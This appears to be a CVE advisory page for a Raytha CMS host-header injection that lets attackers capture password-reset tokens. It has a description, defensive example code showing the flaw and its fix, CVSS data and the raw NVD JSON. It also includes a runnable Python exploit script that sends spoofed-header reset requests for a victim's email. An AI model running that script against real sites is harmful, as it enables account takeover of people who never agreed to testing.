Security Vulnerability Report
CVE-2025-69240 CVSS 8.8 HIGH

CVE-2025-69240

Published: 2026-03-16 14:18:01
Last Modified: 2026-03-16 19:30:43

Description

Raytha CMS allows an attacker to spoof the `X-Forwarded-Host` or `Host` header to an attacker-controlled domain. An attacker who knows the victim's email address can force the server to send an email whose password reset link points to the domain taken from the spoofed header. When the victim clicks the link, the browser sends the request to the attacker's domain with the token in the path, allowing the attacker to capture the token, reset the victim's password and take over the victim's account. This issue was fixed in version 1.4.6.
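The mechanism above, as an added example that is not Raytha's code: a hypothetical reset-link builder that derives the absolute URL from request headers, the hardened form that derives it from a server-side configured base URL so the request cannot influence where the token is sent, and an allowed-hosts check that a reverse proxy or middleware can apply. The `/auth/password-reset` path is the one this page's PoC uses; hostnames, the token and the header values are constructed.

```python
# Added example (not Raytha's code): a hypothetical reset-link builder that
# trusts request headers, the hardened form that uses a configured base URL,
# and an allowed-hosts check for Host / X-Forwarded-Host.
import re

# Hostname with optional :port; anything else (userinfo, paths, spaces) fails.
_HOST_RE = re.compile(r"^([a-z0-9.-]+)(:\d{1,5})?$")


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """Derive the absolute URL from X-Forwarded-Host / Host, as the CVE
    describes; whoever controls those headers decides where the token goes."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/auth/password-reset?token={token}"


def reset_link_fixed(token: str, canonical_base: str) -> str:
    """Derive the URL from a server-side configured base; the request is not
    consulted at all, so a spoofed Host cannot redirect the reset token."""
    return f"{canonical_base.rstrip('/')}/auth/password-reset?token={token}"


def is_trusted_host(headers: dict, allowed_hosts: set) -> bool:
    """Reject requests whose Host or X-Forwarded-Host is not a configured
    hostname. Names are lower-cased, ports ignored, and only the first entry
    of a comma-separated X-Forwarded-Host chain is considered."""
    for name in ("Host", "X-Forwarded-Host"):
        value = headers.get(name)
        if value is None:
            continue
        first = value.split(",")[0].strip().lower()
        match = _HOST_RE.match(first)
        if not match or match.group(1) not in allowed_hosts:
            return False
    return True


# Constructed sample data: a request whose forwarded host was spoofed,
# a genuine one, and the deployment's configured canonical hostname.
SPOOFED = {"Host": "cms.example.org", "X-Forwarded-Host": "attacker.example"}
GENUINE = {"Host": "cms.example.org"}
CANONICAL_BASE = "https://cms.example.org"
ALLOWED_HOSTS = {"cms.example.org"}
TOKEN = "constructed-token-value"


def demo() -> dict:
    return {
        "vulnerable_link": reset_link_vulnerable(SPOOFED, TOKEN),
        "fixed_link": reset_link_fixed(TOKEN, CANONICAL_BASE),
        "spoofed_request_trusted": is_trusted_host(SPOOFED, ALLOWED_HOSTS),
        "genuine_request_trusted": is_trusted_host(GENUINE, ALLOWED_HOSTS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the block prints the spoofed link pointing at `attacker.example` next to the fixed link pointing at the configured host, and shows the spoofed request failing the allowed-hosts check while the genuine one passes.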

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:* - VULNERABLE
Raytha CMS < 1.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69240 PoC - Raytha CMS Host Header Injection
# Description: Attacker spoofs Host/X-Forwarded-Host header to redirect password reset link
import argparse

import requests


def exploit_raytha_cms(target_url, victim_email, attacker_domain):
    """
    Exploit CVE-2025-69240 by sending a password reset request with a spoofed Host header.

    Args:
        target_url: Base URL of the vulnerable Raytha CMS instance
        victim_email: Email address of the victim
        attacker_domain: Attacker-controlled domain used to capture tokens
    """
    # Step 1: Request a password reset with a spoofed Host header
    reset_endpoint = f"{target_url}/auth/password-reset"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        # Spoof the Host header to redirect the password reset link
        'X-Forwarded-Host': attacker_domain,
        'Host': attacker_domain,
    }
    data = {'email': victim_email}

    print(f"[*] Sending password reset request for {victim_email}")
    print(f"[*] Spoofed Host header: {attacker_domain}")
    try:
        response = requests.post(reset_endpoint, data=data, headers=headers, verify=False)
        print(f"[+] Password reset request sent (HTTP {response.status_code})")
        print("[*] Check attacker domain logs for incoming token requests")
        print(f"[*] The victim will receive an email with reset link pointing to: "
              f"https://{attacker_domain}/auth/password-reset?token=XXX")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-69240 Raytha CMS Host Header Injection')
    parser.add_argument('--target', required=True, help='Target Raytha CMS URL')
    parser.add_argument('--email', required=True, help='Victim email address')
    parser.add_argument('--attacker-domain', required=True, help='Attacker controlled domain')
    args = parser.parse_args()
    exploit_raytha_cms(args.target, args.email, args.attacker_domain)

References

https://cert.pl/en/posts/2026/03/CVE-2025-69236 (Third Party Advisory)
https://raytha.com (Product)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-69240",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T14:18:01.207",
    "lastModified": "2026-03-16T19:30:42.687",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Raytha CMS allows an attacker to spoof `X-Forwarded-Host` or `Host` headers to attacker controlled domain. The attacker (who knows the victim's email address) can force the server to send an email with password reset link pointing to the domain from spoofed header. When victim clicks the link, browser sends request to the attacker’s domain with the token in the path allowing the attacker to capture the token. This allows the attacker to reset victim's password and take over the victim's account.\n\nThis issue was fixed in version 1.4.6."
      },
      {
        "lang": "es",
        "value": "Raytha CMS permite a un atacante suplantar los encabezados `X-Forwarded-Host` o `Host` a un dominio controlado por el atacante. El atacante (que conoce la dirección de correo electrónico de la víctima) puede forzar al servidor a enviar un correo electrónico con un enlace de restablecimiento de contraseña que apunta al dominio del encabezado suplantado. Cuando la víctima hace clic en el enlace, el navegador envía una solicitud al dominio del atacante con el token en la ruta, lo que permite al atacante capturar el token. Esto permite al atacante restablecer la contraseña de la víctima y tomar el control de la cuenta de la víctima.\n\nEste problema se solucionó en la versión 1.4.6."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-348"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.4.6",
                "matchCriteriaId": "4A4FC7D6-F33F-4121-A375-B063263585FD"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://cert.pl/en/posts/2026/03/CVE-2025-69236",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://raytha.com",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}